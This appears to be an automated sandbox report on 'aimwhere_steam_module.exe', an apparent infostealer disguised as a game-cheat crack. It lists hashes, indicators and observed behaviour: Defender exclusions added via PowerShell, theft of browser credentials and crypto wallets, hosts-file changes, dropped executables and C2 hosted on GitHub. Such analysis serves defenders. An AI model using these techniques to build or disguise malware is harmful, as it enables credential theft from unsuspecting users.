d770e3cb51a2e8186a92954d5c09ba46297922239ca7246b8e59c6acc88b9329

Analysis

max time kernel
869s
max time network
868s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
29/05/2024, 12:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aimwhere_crack/aimwhere_steam_module.exe
Size

12.5MB
MD5

637a214e92b7bfd20ea382ec7305ca1b
SHA1

c1da5b2ca143179947c87eb73cf1922412463f43
SHA256

0af2bce0e477fcfbd758fccc38940f9d09c33365646e2d90178cdbbad215da11
SHA512

5543f96f4bbfe6ef8d97db01fdc5c0934d5b9afbad95176973e067ad901c3a621c6be2eb972c804626597efc1606a19202bff88c869890973eeb0b9cdf4fbcf0
SSDEEP

196608:qr3fdO9VinmFhv46MxGTGSIyShO+urErvI9pWjgfPvzm6gsIWjEB4Aum:Od+Jv46eWshO+urEUWjC3zDGWj84Aum

Score

8^/10

execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4180	powershell.exe
4556	powershell.exe
948	powershell.exe
4416	powershell.exe
2244	powershell.exe
5032	powershell.exe
3988	powershell.exe
1052	powershell.exe
1612	powershell.exe
1084	powershell.exe
2872	powershell.exe
400	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	aimwhere_steam_module.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	aimwhere_steam_module.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	aimwhere_steam_module.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	aimwhere_steam_module.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Executes dropped EXE 14 IoCs

pid	Process
4788	bound.exe
1932	rar.exe
2020	bound.exe
2340	bound.exe
5004	rar.exe
2884	bound.exe
2512	rar.exe
4024	bound.exe
632	rar.exe
372	recoverit_setup_full4174.exe
2480	recoverit_setup_full4174.exe
5916	recoverit_setup_full4174.exe
5472	NFWCHK.exe
2100	rar.exe

Loads dropped DLL 64 IoCs

pid	Process
3092	aimwhere_steam_module.exe
3092	aimwhere_steam_module.exe
3092	aimwhere_steam_module.exe
3092	aimwhere_steam_module.exe
3092	aimwhere_steam_module.exe
3092	aimwhere_steam_module.exe
3092	aimwhere_steam_module.exe
3092	aimwhere_steam_module.exe
3092	aimwhere_steam_module.exe
3092	aimwhere_steam_module.exe
3092	aimwhere_steam_module.exe
3092	aimwhere_steam_module.exe
3092	aimwhere_steam_module.exe
3092	aimwhere_steam_module.exe
3092	aimwhere_steam_module.exe
3092	aimwhere_steam_module.exe
3092	aimwhere_steam_module.exe
3092	aimwhere_steam_module.exe
4788	bound.exe
4480	aimwhere_steam_module.exe
4480	aimwhere_steam_module.exe
4480	aimwhere_steam_module.exe
4480	aimwhere_steam_module.exe
4480	aimwhere_steam_module.exe
4480	aimwhere_steam_module.exe
4480	aimwhere_steam_module.exe
4480	aimwhere_steam_module.exe
4480	aimwhere_steam_module.exe
4480	aimwhere_steam_module.exe
4480	aimwhere_steam_module.exe
4480	aimwhere_steam_module.exe
4480	aimwhere_steam_module.exe
4480	aimwhere_steam_module.exe
4480	aimwhere_steam_module.exe
4480	aimwhere_steam_module.exe
4480	aimwhere_steam_module.exe
4480	aimwhere_steam_module.exe
2340	bound.exe
2360	aimwhere_steam_module.exe
2360	aimwhere_steam_module.exe
2360	aimwhere_steam_module.exe
2360	aimwhere_steam_module.exe
2360	aimwhere_steam_module.exe
2360	aimwhere_steam_module.exe
2360	aimwhere_steam_module.exe
2360	aimwhere_steam_module.exe
2360	aimwhere_steam_module.exe
2360	aimwhere_steam_module.exe
2360	aimwhere_steam_module.exe
2360	aimwhere_steam_module.exe
2360	aimwhere_steam_module.exe
2360	aimwhere_steam_module.exe
2360	aimwhere_steam_module.exe
2360	aimwhere_steam_module.exe
2360	aimwhere_steam_module.exe
2360	aimwhere_steam_module.exe
2884	bound.exe
1412	aimwhere_steam_module.exe
1412	aimwhere_steam_module.exe
1412	aimwhere_steam_module.exe
1412	aimwhere_steam_module.exe
1412	aimwhere_steam_module.exe
1412	aimwhere_steam_module.exe
1412	aimwhere_steam_module.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000002344e-63.dat	upx
behavioral1/memory/3092-67-0x00007FFB520D0000-0x00007FFB526C2000-memory.dmp	upx
behavioral1/files/0x000700000002344c-72.dat	upx
behavioral1/files/0x000700000002341f-125.dat	upx
behavioral1/memory/3092-127-0x00007FFB674E0000-0x00007FFB674EF000-memory.dmp	upx
behavioral1/memory/3092-126-0x00007FFB65870000-0x00007FFB65894000-memory.dmp	upx
behavioral1/files/0x000700000002341e-124.dat	upx
behavioral1/files/0x000700000002341d-123.dat	upx
behavioral1/files/0x000700000002341c-122.dat	upx
behavioral1/files/0x000700000002341b-121.dat	upx
behavioral1/files/0x0007000000023419-120.dat	upx
behavioral1/files/0x0007000000023454-119.dat	upx
behavioral1/files/0x0007000000023452-118.dat	upx
behavioral1/files/0x0007000000023451-117.dat	upx
behavioral1/files/0x000700000002344d-114.dat	upx
behavioral1/files/0x000700000002344b-113.dat	upx
behavioral1/files/0x000700000002341a-70.dat	upx
behavioral1/memory/3092-132-0x00007FFB60FF0000-0x00007FFB6101D000-memory.dmp	upx
behavioral1/memory/3092-133-0x00007FFB60DC0000-0x00007FFB60DD9000-memory.dmp	upx
behavioral1/memory/3092-134-0x00007FFB60C50000-0x00007FFB60C73000-memory.dmp	upx
behavioral1/memory/3092-135-0x00007FFB516E0000-0x00007FFB5185E000-memory.dmp	upx
behavioral1/memory/3092-137-0x00007FFB61440000-0x00007FFB6144D000-memory.dmp	upx
behavioral1/memory/3092-136-0x00007FFB60CC0000-0x00007FFB60CD9000-memory.dmp	upx
behavioral1/memory/3092-138-0x00007FFB5FE60000-0x00007FFB5FE93000-memory.dmp	upx
behavioral1/memory/3092-139-0x00007FFB511F0000-0x00007FFB512BD000-memory.dmp	upx
behavioral1/memory/3092-140-0x00007FFB50CC0000-0x00007FFB511E9000-memory.dmp	upx
behavioral1/memory/3092-142-0x00007FFB61BC0000-0x00007FFB61BD4000-memory.dmp	upx
behavioral1/memory/3092-144-0x00007FFB613B0000-0x00007FFB613BD000-memory.dmp	upx
behavioral1/memory/3092-143-0x00007FFB520D0000-0x00007FFB526C2000-memory.dmp	upx
behavioral1/memory/3092-146-0x00007FFB65870000-0x00007FFB65894000-memory.dmp	upx
behavioral1/memory/3092-147-0x00007FFB515C0000-0x00007FFB516DC000-memory.dmp	upx
behavioral1/memory/3092-363-0x00007FFB60C50000-0x00007FFB60C73000-memory.dmp	upx
behavioral1/memory/3092-348-0x00007FFB520D0000-0x00007FFB526C2000-memory.dmp	upx
behavioral1/memory/3092-360-0x00007FFB61BC0000-0x00007FFB61BD4000-memory.dmp	upx
behavioral1/memory/3092-359-0x00007FFB50CC0000-0x00007FFB511E9000-memory.dmp	upx
behavioral1/memory/3092-358-0x00007FFB511F0000-0x00007FFB512BD000-memory.dmp	upx
behavioral1/memory/3092-357-0x00007FFB5FE60000-0x00007FFB5FE93000-memory.dmp	upx
behavioral1/memory/3092-355-0x00007FFB60CC0000-0x00007FFB60CD9000-memory.dmp	upx
behavioral1/memory/3092-354-0x00007FFB516E0000-0x00007FFB5185E000-memory.dmp	upx
behavioral1/memory/3092-349-0x00007FFB65870000-0x00007FFB65894000-memory.dmp	upx
behavioral1/memory/3092-374-0x00007FFB511F0000-0x00007FFB512BD000-memory.dmp	upx
behavioral1/memory/3092-378-0x00007FFB515C0000-0x00007FFB516DC000-memory.dmp	upx
behavioral1/memory/3092-385-0x00007FFB516E0000-0x00007FFB5185E000-memory.dmp	upx
behavioral1/memory/3092-384-0x00007FFB60C50000-0x00007FFB60C73000-memory.dmp	upx
behavioral1/memory/3092-383-0x00007FFB60DC0000-0x00007FFB60DD9000-memory.dmp	upx
behavioral1/memory/3092-382-0x00007FFB60FF0000-0x00007FFB6101D000-memory.dmp	upx
behavioral1/memory/3092-381-0x00007FFB674E0000-0x00007FFB674EF000-memory.dmp	upx
behavioral1/memory/3092-380-0x00007FFB65870000-0x00007FFB65894000-memory.dmp	upx
behavioral1/memory/3092-379-0x00007FFB520D0000-0x00007FFB526C2000-memory.dmp	upx
behavioral1/memory/3092-377-0x00007FFB613B0000-0x00007FFB613BD000-memory.dmp	upx
behavioral1/memory/3092-376-0x00007FFB61BC0000-0x00007FFB61BD4000-memory.dmp	upx
behavioral1/memory/3092-375-0x00007FFB50CC0000-0x00007FFB511E9000-memory.dmp	upx
behavioral1/memory/3092-373-0x00007FFB5FE60000-0x00007FFB5FE93000-memory.dmp	upx
behavioral1/memory/3092-372-0x00007FFB61440000-0x00007FFB6144D000-memory.dmp	upx
behavioral1/memory/3092-371-0x00007FFB60CC0000-0x00007FFB60CD9000-memory.dmp	upx
behavioral1/memory/4480-926-0x00007FFB51870000-0x00007FFB51E62000-memory.dmp	upx
behavioral1/memory/4480-928-0x00007FFB6AAA0000-0x00007FFB6AAAF000-memory.dmp	upx
behavioral1/memory/4480-927-0x00007FFB69130000-0x00007FFB69154000-memory.dmp	upx
behavioral1/memory/4480-936-0x00007FFB522B0000-0x00007FFB5242E000-memory.dmp	upx
behavioral1/memory/4480-935-0x00007FFB690D0000-0x00007FFB690F3000-memory.dmp	upx
behavioral1/memory/4480-934-0x00007FFB691A0000-0x00007FFB691B9000-memory.dmp	upx
behavioral1/memory/4480-933-0x00007FFB69100000-0x00007FFB6912D000-memory.dmp	upx
behavioral1/memory/4480-938-0x00007FFB690A0000-0x00007FFB690AD000-memory.dmp	upx
behavioral1/memory/4480-937-0x00007FFB690B0000-0x00007FFB690C9000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
158	raw.githubusercontent.com
153	raw.githubusercontent.com
154	raw.githubusercontent.com
155	raw.githubusercontent.com
156	raw.githubusercontent.com
157	raw.githubusercontent.com

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
25	ip-api.com
164	ip-api.com
169	ip-api.com
177	ip-api.com
182	ip-api.com
186	ip-api.com
445	ip-api.com
14	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 20 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Detects videocard installed 1 TTPs 13 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2868	WMIC.exe
4920	WMIC.exe
4512	WMIC.exe
1404	WMIC.exe
1288	WMIC.exe
4528	WMIC.exe
2884	WMIC.exe
3092	WMIC.exe
3988	WMIC.exe
1484	WMIC.exe
3464	WMIC.exe
1400	WMIC.exe
1472	WMIC.exe

Enumerates processes with tasklist 1 TTPs 24 IoCs

Process Discovery

T1057

pid	Process
4200	tasklist.exe
2272	tasklist.exe
5448	tasklist.exe
5080	tasklist.exe
4468	tasklist.exe
4976	tasklist.exe
2184	tasklist.exe
2308	tasklist.exe
4556	tasklist.exe
228	tasklist.exe
5320	tasklist.exe
4928	tasklist.exe
428	tasklist.exe
3368	tasklist.exe
1224	tasklist.exe
1528	tasklist.exe
2324	tasklist.exe
4512	tasklist.exe
2364	tasklist.exe
4968	tasklist.exe
4784	tasklist.exe
3980	tasklist.exe
3428	tasklist.exe
4268	tasklist.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Gathers system information 1 TTPs 5 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2516	systeminfo.exe
996	systeminfo.exe
2496	systeminfo.exe
2444	systeminfo.exe
2076	systeminfo.exe

Kills process with taskkill 26 IoCs

evasion

pid	Process
3784	taskkill.exe
4044	taskkill.exe
3704	taskkill.exe
832	taskkill.exe
5436	taskkill.exe
3676	taskkill.exe
6072	taskkill.exe
5264	taskkill.exe
2268	taskkill.exe
1224	taskkill.exe
4616	taskkill.exe
4272	taskkill.exe
5036	taskkill.exe
2012	taskkill.exe
4172	taskkill.exe
3044	taskkill.exe
5924	taskkill.exe
4200	taskkill.exe
2256	taskkill.exe
4744	taskkill.exe
3976	taskkill.exe
3840	taskkill.exe
5224	taskkill.exe
4728	taskkill.exe
3720	taskkill.exe
3216	taskkill.exe

Modifies Control Panel 1 IoCs

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\Desktop\MuiCached	recoverit_setup_full4174.exe

Modifies registry class 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	bound.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	bound.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	bound.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4124900551-4068476067-3491212533-1000\{772175E6-03C6-4C39-A6EE-F4CAFB45706E}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	bound.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	bound.exe

NTFS ADS 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\aimwhere_crack.zip:Zone.Identifier	firefox.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 736350.crdownload:SmartScreen	msedge.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
4948	PING.EXE
1608	PING.EXE
5008	PING.EXE
4524	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1612	powershell.exe
1612	powershell.exe
4088	powershell.exe
4088	powershell.exe
1084	powershell.exe
1084	powershell.exe
1612	powershell.exe
1084	powershell.exe
4088	powershell.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4788	bound.exe
4556	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
912	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs

pid	Process
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3428	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3480	WMIC.exe
Token: SeSecurityPrivilege	3480	WMIC.exe
Token: SeTakeOwnershipPrivilege	3480	WMIC.exe
Token: SeLoadDriverPrivilege	3480	WMIC.exe
Token: SeSystemProfilePrivilege	3480	WMIC.exe
Token: SeSystemtimePrivilege	3480	WMIC.exe
Token: SeProfSingleProcessPrivilege	3480	WMIC.exe
Token: SeIncBasePriorityPrivilege	3480	WMIC.exe
Token: SeCreatePagefilePrivilege	3480	WMIC.exe
Token: SeBackupPrivilege	3480	WMIC.exe
Token: SeRestorePrivilege	3480	WMIC.exe
Token: SeShutdownPrivilege	3480	WMIC.exe
Token: SeDebugPrivilege	3480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3480	WMIC.exe
Token: SeRemoteShutdownPrivilege	3480	WMIC.exe
Token: SeUndockPrivilege	3480	WMIC.exe
Token: SeManageVolumePrivilege	3480	WMIC.exe
Token: 33	3480	WMIC.exe
Token: 34	3480	WMIC.exe
Token: 35	3480	WMIC.exe
Token: 36	3480	WMIC.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	4088	powershell.exe
Token: SeDebugPrivilege	1084	powershell.exe
Token: SeIncreaseQuotaPrivilege	3480	WMIC.exe
Token: SeSecurityPrivilege	3480	WMIC.exe
Token: SeTakeOwnershipPrivilege	3480	WMIC.exe
Token: SeLoadDriverPrivilege	3480	WMIC.exe
Token: SeSystemProfilePrivilege	3480	WMIC.exe
Token: SeSystemtimePrivilege	3480	WMIC.exe
Token: SeProfSingleProcessPrivilege	3480	WMIC.exe
Token: SeIncBasePriorityPrivilege	3480	WMIC.exe
Token: SeCreatePagefilePrivilege	3480	WMIC.exe
Token: SeBackupPrivilege	3480	WMIC.exe
Token: SeRestorePrivilege	3480	WMIC.exe
Token: SeShutdownPrivilege	3480	WMIC.exe
Token: SeDebugPrivilege	3480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3480	WMIC.exe
Token: SeRemoteShutdownPrivilege	3480	WMIC.exe
Token: SeUndockPrivilege	3480	WMIC.exe
Token: SeManageVolumePrivilege	3480	WMIC.exe
Token: 33	3480	WMIC.exe
Token: 34	3480	WMIC.exe
Token: 35	3480	WMIC.exe
Token: 36	3480	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2868	WMIC.exe
Token: SeSecurityPrivilege	2868	WMIC.exe
Token: SeTakeOwnershipPrivilege	2868	WMIC.exe
Token: SeLoadDriverPrivilege	2868	WMIC.exe
Token: SeSystemProfilePrivilege	2868	WMIC.exe
Token: SeSystemtimePrivilege	2868	WMIC.exe
Token: SeProfSingleProcessPrivilege	2868	WMIC.exe
Token: SeIncBasePriorityPrivilege	2868	WMIC.exe
Token: SeCreatePagefilePrivilege	2868	WMIC.exe
Token: SeBackupPrivilege	2868	WMIC.exe
Token: SeRestorePrivilege	2868	WMIC.exe
Token: SeShutdownPrivilege	2868	WMIC.exe
Token: SeDebugPrivilege	2868	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2868	WMIC.exe
Token: SeRemoteShutdownPrivilege	2868	WMIC.exe
Token: SeUndockPrivilege	2868	WMIC.exe
Token: SeManageVolumePrivilege	2868	WMIC.exe
Token: 33	2868	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2236	firefox.exe
2236	firefox.exe
2236	firefox.exe
2236	firefox.exe
4344	7zFM.exe
4508	7zFM.exe
4232	7zFM.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2236	firefox.exe
2236	firefox.exe
2236	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
3516	firefox.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe

Suspicious use of SetWindowsHookEx 15 IoCs

pid	Process
912	OpenWith.exe
4184	OpenWith.exe
2236	firefox.exe
2236	firefox.exe
2236	firefox.exe
2236	firefox.exe
2236	firefox.exe
2236	firefox.exe
2236	firefox.exe
1920	OpenWith.exe
1888	OpenWith.exe
388	OpenWith.exe
3516	firefox.exe
372	recoverit_setup_full4174.exe
372	recoverit_setup_full4174.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 756 wrote to memory of 3092	756	aimwhere_steam_module.exe	85
PID 756 wrote to memory of 3092	756	aimwhere_steam_module.exe	85
PID 3092 wrote to memory of 1844	3092	aimwhere_steam_module.exe	89
PID 3092 wrote to memory of 1844	3092	aimwhere_steam_module.exe	89
PID 3092 wrote to memory of 2380	3092	aimwhere_steam_module.exe	90
PID 3092 wrote to memory of 2380	3092	aimwhere_steam_module.exe	90
PID 3092 wrote to memory of 704	3092	aimwhere_steam_module.exe	93
PID 3092 wrote to memory of 704	3092	aimwhere_steam_module.exe	93
PID 3092 wrote to memory of 4736	3092	aimwhere_steam_module.exe	94
PID 3092 wrote to memory of 4736	3092	aimwhere_steam_module.exe	94
PID 3092 wrote to memory of 3624	3092	aimwhere_steam_module.exe	96
PID 3092 wrote to memory of 3624	3092	aimwhere_steam_module.exe	96
PID 3092 wrote to memory of 3536	3092	aimwhere_steam_module.exe	99
PID 3092 wrote to memory of 3536	3092	aimwhere_steam_module.exe	99
PID 704 wrote to memory of 1612	704	cmd.exe	101
PID 704 wrote to memory of 1612	704	cmd.exe	101
PID 3624 wrote to memory of 3428	3624	cmd.exe	102
PID 3624 wrote to memory of 3428	3624	cmd.exe	102
PID 3536 wrote to memory of 3480	3536	cmd.exe	103
PID 3536 wrote to memory of 3480	3536	cmd.exe	103
PID 1844 wrote to memory of 1084	1844	cmd.exe	104
PID 1844 wrote to memory of 1084	1844	cmd.exe	104
PID 2380 wrote to memory of 4088	2380	cmd.exe	105
PID 2380 wrote to memory of 4088	2380	cmd.exe	105
PID 4736 wrote to memory of 4788	4736	cmd.exe	106
PID 4736 wrote to memory of 4788	4736	cmd.exe	106
PID 3092 wrote to memory of 1068	3092	aimwhere_steam_module.exe	109
PID 3092 wrote to memory of 1068	3092	aimwhere_steam_module.exe	109
PID 1068 wrote to memory of 4812	1068	cmd.exe	112
PID 1068 wrote to memory of 4812	1068	cmd.exe	112
PID 3092 wrote to memory of 2372	3092	aimwhere_steam_module.exe	113
PID 3092 wrote to memory of 2372	3092	aimwhere_steam_module.exe	113
PID 2372 wrote to memory of 5032	2372	cmd.exe	115
PID 2372 wrote to memory of 5032	2372	cmd.exe	115
PID 3092 wrote to memory of 3608	3092	aimwhere_steam_module.exe	116
PID 3092 wrote to memory of 3608	3092	aimwhere_steam_module.exe	116
PID 3608 wrote to memory of 2868	3608	cmd.exe	118
PID 3608 wrote to memory of 2868	3608	cmd.exe	118
PID 3092 wrote to memory of 1720	3092	aimwhere_steam_module.exe	119
PID 3092 wrote to memory of 1720	3092	aimwhere_steam_module.exe	119
PID 1720 wrote to memory of 4920	1720	cmd.exe	184
PID 1720 wrote to memory of 4920	1720	cmd.exe	184
PID 3092 wrote to memory of 3084	3092	aimwhere_steam_module.exe	122
PID 3092 wrote to memory of 3084	3092	aimwhere_steam_module.exe	122
PID 3092 wrote to memory of 3708	3092	aimwhere_steam_module.exe	123
PID 3092 wrote to memory of 3708	3092	aimwhere_steam_module.exe	123
